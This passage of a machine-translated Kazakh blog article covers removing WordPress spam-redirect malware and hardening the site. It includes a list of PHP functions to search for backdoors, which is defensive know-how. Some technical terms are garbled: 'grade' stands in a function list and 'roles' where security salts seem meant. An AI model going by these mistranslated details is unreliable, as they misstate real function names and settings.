Тазалау үшін дерекқорды жүктеп салу үшін phpMyAdmin пайдаланыңыз. Содан кейін кестелерді спам URL мекенжайлары немесе кілт сөздер сияқты күдікті мазмұнның бар-жоғын тексеріңіз. Бұл мазмұнды абайлап алып тастаңыз, оның жаман код екеніне және жақсы код өзгертілмегеніне көз жеткізіңіз.

Атап айтқанда, келесі кестелерді тексеріңіз:

— wp_options
— wp_posts

Веб-сайтыңыздың өлшеміне байланысты бұл айтарлықтай уақытты алуы мүмкін. Жалпы, зиянды бағдарлама wp_posts кестеңізде болса, ол әрбір постта болады. Егер сізде көп мазмұнды жүздеген хабарламалар болса, онда қолмен тазалау монументалды міндет.

Дегенмен, зиянды бағдарлама сценарийін анықтағаннан кейін, сценарийді әрбір хабардан жою үшін SQL (немесе SQL түсінетін адамнан сұрау) пайдалануға болады. Мұнда ескерту мынада, бұл үстелдегі жалғыз зиянды бағдарлама екеніне сенімді бола алмайсыз.

Сондай-ақ, әсіресе электрондық коммерция сайттарында маңызды пайдаланушы немесе тапсырыс ақпаратын өшіріп жатқаныңызды екі рет тексеріңіз.

4. Артқы есіктерді алып тастаңыз

Веб-сайтыңызды зиянды бағдарламалардан тазартқаннан кейін, бэкдорларды тексеріңіз. Бұл сіздің веб-сайтыңызға кіру нүктелері, оны хакер қалдырады, осылайша олар бастапқы бұзақылық анықталған жағдайда сіздің веб-сайтыңызды қайта жұқтыруы мүмкін.

Артқы есіктер бірнеше жерде болуы мүмкін. Іздеу үшін кейбір код:

• grade
• base64_decode
• gzinflate
• preg_replace
• str_rot13

Ескерту: олар міндетті түрде жаман емес. Бұл бэкдор ретінде қызмет ету үшін аздап өзгертуге болатын заңды PHP сценарийлері. Кез келгенін дұрыс талдаусыз алып тастаудан сақ болыңыз.

5. Тазартылған файлдарды қайта жүктеңіз

Енді сіз бұзуды жойғаннан кейін сайтыңызды қайтадан біріктіруіңіз керек. Файлдарды қайта жүктеп салу үшін файл менеджерін және веб-сайтыңызды ауыстыру үшін cPanel немесе VestaCP жүйесінде phpMyAdmin пайдаланыңыз.

Бұл сақтық көшірмені қолмен қалпына келтіруге өте ұқсас және алдымен бар файлдар мен дерекқорды жою керек дегенді білдіреді. Бастапқыда сақтық көшірме жасау қадамын байқаусызда өткізіп алсаңыз, оны қазір жасаңыз. Веб-сайтыңыздың сақтық көшірмесін жасау, тіпті бұзылған болса да, бірдеңе дұрыс болмаса, сізді қайғыдан құтқарады.

6. Сайт кэшін тазалау

Енді тазартылған веб-сайт жүктелгеннен кейін кэшті тазалаңыз. Кэш сіздің беттеріңіз бен мазмұныңыздың алдыңғы нұсқаларын сақтайды және оларды сайтқа кірушілерге көрсетеді. Жаңадан тазартылған сайт күтілгендей әрекет етуі үшін кэшті тазалау керек.

7. Плагиндер мен тақырыптардың әрқайсысын тексеріңіз

Зиянды бағдарлама туралы қайғылы факт, ол кез келген жерде дерлік жасыра алады. Сіз веб-сайтыңызды қолмен тазалауға барлық уақыт пен күш жұмсағандықтан, күш-жігеріңіз сәтті болғанына көз жеткізу үшін қосымша бірнеше минут жұмсаған жөн.

Бұл үшін FTP пайдалануды ұсынамын, себебі веб-сайт файлдарын өзгерту үшін көп жұмыс қажет болады.

• wp_contents қалтасының атын басқа нәрсеге өзгерту арқылы барлық плагиндер мен тақырыптарды өшіріңіз.
• Содан кейін сайтты қайта бағыттау үшін тексерген сайын оларды бір-бірден белсендіріңіз.
• Егер проблемалар болмаса, плагиндер мен тақырыптарда зиянды бағдарламалар жоқ екенін білесіз.

Неліктен мен хакерлердің қайта бағыттауларын қолмен жоюға кеңес беремін

Сіз бұзақыларды осылай жоюды неге ұсынбаймын деп ойлайтын шығарсыз. Қатерлі ісік немесе сүйек сынуы сияқты ауру туралы ойлайтындай хакерлерді ойлап көріңіз.

Сіз бұл ауруларға күтім жасауды оларды емдеуде үлкен тәжірибесі бар білікті мамандарға тапсырғаныңыз жөн. Тәжірибесіз адамдар пайдасынан гөрі зияны көп. Жаман емделген сүйек сынығымен күресуге тура келген кез келген дәрігерден сұраңыз.

Бұзушылықты қолмен жою кезінде қате болуы мүмкін бірнеше нәрсе бар:

• Зиянды бағдарламалық құрал күтпеген жерлерге таралуы мүмкін және қатесіз жою қиын.
• Егер осалдықтар және/немесе бэк есіктер түзетілмесе, зиянды бағдарламаны жою жеткіліксіз.
• Дұрыс емес жою кейде веб-сайттың басқа бөліктерін бұзуы мүмкін.
• Үлкен сайттар (мысалы, электрондық коммерция дүкендері) қолмен өту өте қиын және көп уақытты қажет етеді.
• Уақыт өте маңызды, өйткені бұзулар уақыт өте келе нашарлайды.
• Егер хост тіркелгіңізге тыйым салған болса, веб-сайтыңызға кіре алмауы мүмкін

Қарапайым тілмен айтқанда, бұзылған веб-сайтта үлкен қателік бар. Бұл процестен сіз бастағаннан да нашар жағдайда шығудың нақты қаупі бар. Хакер сценарийлерін жою үшін жақсы қауіпсіздік плагинін қолданған дұрыс.

Веб-сайт спамға қайта бағытталуда: бұл менің веб-сайтыма қалай әсер етті?

Веб-сайттар бағдарламалық жасақтаманың күрделі қоспалары болып табылады және олардың негізінде 100%-де ешбір бағдарламалық құрал бұзылмайды. Бұл кешегі 8 биттік ойындардан бастап банктер пайдаланатын үлкен басқару ақпараттық жүйелеріне дейін кез келген бағдарламалық жасақтаманың шындығы.

WordPress веб-сайттары басқаша емес. WordPress негізгі файлдары оқ өткізбейтін болуға жақын болғанымен, плагиндер мен тақырыптар үшін бұлай айту мүмкін емес. Плагиндер мен тақырыптар веб-сайттарға динамикалық элементтерді, функционалдылықты және дизайнды қосады, оларсыз сайт қауіпсіз, бірақ сонымен бірге статикалық және қызықсыз болады.

Міне, WordPress сайттарының бұзылу себептері:

1. Плагиндер мен тақырыптардағы осалдықтар;
2. Нашар парольдер және бұзылған пайдаланушы тіркелгілері;
3. Нөлсіз тақырыптар мен плагиндердегі бэкдорлар;
4. XSS сценарийінің шабуылдары;
5. Боттармен қатал күш шабуылдары.

Жоғарыда айтылғандай, веб-сайттың қауіпсіздігіне жеңіл қарауға болмайды. Енді сізде бұзуды түзету қаншалықты қиын екендігі туралы өз тәжірибеңіз бар, сондықтан оның қайталанбауын қамтамасыз ету үшін сізде стратегия болуы керек.

Болашақта WordPress Redirect бұзушылықтарын қалай болдырмауға болады?

Енді сізде таза веб-сайт бар, келесі қадамдар сіздің WordPress веб-сайтыңызды спамға қайта бағыттаудан сақтау болып табылады.

Бұзушылықтар үнемі қайталанады. Бұл, ең алдымен, сіздің сайтыңызды бұзу себебі анықталмағанымен байланысты. Қайталанудың алдын алу үшін келесі әрекеттерді орындау қажет:

1. Қауіпсіздік плагинін орнатыңыз: сканерлеуге, тазалауға және бұзудан қорғайтын жақсы қауіпсіздік плагинін таңдаңыз. Бұл плагиндерде зиянды трафикті сайтыңызға кіруді алдын ала блоктайтын кірістірілген брандмауэр бар.
2. Пайдаланушылар мен дерекқорға арналған барлық құпия сөздерді өзгертіңіз: Бұзылған пайдаланушы тіркелгілері және оңай болжалды құпия сөздер веб-сайтты бұзудың екінші себебі болып табылады.
3. Пайдаланушы тіркелгілерін қалпына келтіріңіз және тексеріңіз: Қажетсіз әкімші рұқсаты бар пайдаланушы тіркелгілерін тексеріңіз және оларды жойыңыз.
4. Рөлдерді + қауіпсіздік кілттерін өзгерту: рөлдер мен қауіпсіздік кілттері - пайдаланушыларға қауіпсіз жүйеге кіруге көмектесу үшін WordPress cookie файлдарына кіру деректеріне тіркейтін ұзын жолдар. Жаңаларын алу үшін WordPress генераторын пайдаланғаннан кейін оларды wp-config.php файлында өзгертуге болады.
5. Тек дәлелденген плагиндер мен тақырыптарды пайдалануды ұмытпаңыз: Мен мұны бұрын да айтқанмын, бірақ қайталаған жөн. Тек сенімді әзірлеушілердің плагиндері мен тақырыптарын пайдаланыңыз. Бұл әзірлеушілер қауіпсіздік үшін өте маңызды қолдау мен жаңартуларды қамтамасыз етеді. Ешбір жағдайда бос тақырыптар мен плагиндерді пайдаланбаңыз. Нені сақтасаңыз да, сөзсіз бұзу салдарынан бірнеше есе жоғалтасыз.
6. SSL бар екеніне көз жеткізіңізЖ: Ең дұрысы, сіздің веб-сайтыңызда SSL болуы керек, бірақ біз оны толық болу үшін қосамыз. SSL веб-сайтқа және одан шығатын байланыстың шифрланғанын қамтамасыз етеді. Google бұл өзгерісті де қатты итермелейді және веб-сайтыңызда SSL қосылмаған болса, SEO жазаларын көре бастайсыз.
7. WordPress-ті қорғаңыз: Әдетте WordPress қатайту деп аталатын қауіпсіздікті күшейту шаралары бар. Интернетте қолжетімді кеңестерді орындауды ұмытпауыңызды ескерткім келеді. Олардың кейбіреулері мүлдем жұмыс істемейді және сіздің сайтыңызға және келушілердің тәжірибесіне әсер етеді.
8. Қауіпсіздік жоспарын/тұрақты орындалатын әрекеттерді жасаңыз: бір істі бір рет жасап, оны ұмыту жеткіліксіз. Кем дегенде, пайдаланушыларды үнемі тексеріп, құпия сөзді қалпына келтіруді талап етіңіз. Әрекет журналын орнату да жақсы идея, себебі ол пайдаланушы әрекетін бақылауды оңай және жылдам етеді, бұл көбінесе бұзылған сайттың ерте ескерту белгісі болуы мүмкін.
9. Сіз сондай-ақ бәрін жаңартуыңыз керек.A: WordPress, плагиндер мен тақырыптар және тұрақты сақтық көшірмелерді жасаңыз.

Зиянды қайта бағыттаулардың салдары қандай?

Кез келген бұзу веб-сайтқа қорқынышты әсер етеді, және WordPress қайта бағыттау зиянды бағдарламалық қамтамасыз ету айырмашылығы жоқ. Зиянды бағдарлама сіздің веб-сайтыңызға және бизнесіңізге кері әсер етуі мүмкін бірнеше әдістер:

• Табыстың жоғалуыегер сізде электрондық коммерция немесе бизнес сайты болса.
• Бренд құндылығын жоғалту келушілерді заңсыз, алаяқтық немесе спам-сайттарға қайта бағыттауға байланысты.
• SEO-ға әсеріөйткені Google бұзылған сайттарды өз тізімдерінде жазалайды және кірушілер әдетте кіруге қорқатындай етіп бұзылған сайтты белгілейді.
• Деректерді бұзу сіздің келушілеріңіз және сіздің сайтыңыз.

Бұзушылықтың мүліктің бұзылуына әкелетін көптеген басқа әдістер бар. Маңызды фактор - тез әрекет ету және зиянды бағдарламалардан мүмкіндігінше тезірек құтылу.

Шығару

WordPress қайта бағыттауды бұзуға арналған зиянды бағдарлама мезгіл-мезгіл жаңа аватарда пайда болады. Хакерлер, демек, олардың зиянды бағдарламалары барған сайын ақылды болып келеді. WordPress веб-сайттары олар үшін қазына болып табылады және оларды жеңудің жалғыз жолы - олардың ойыннан озып кету.

WordPress веб-сайтыңызды қорғаудың ең жақсы жолы - кірістірілген брандмауэрмен бірге келетін жақсы қауіпсіздік плагинін орнату. Бұл, сөзсіз, сіздің веб-сайтыңыздың қауіпсіздігіне ең жақсы инвестиция.

Осы мақаланы оқу:

• WordPress - сайттағы спам сілтемесін қалай табуға және жоюға болады?
• WordPress-те байланыс формасының спамын қалай азайтуға болады

Оқығаныңыз үшін рахмет: SEO HELPER | NICOLA.TOP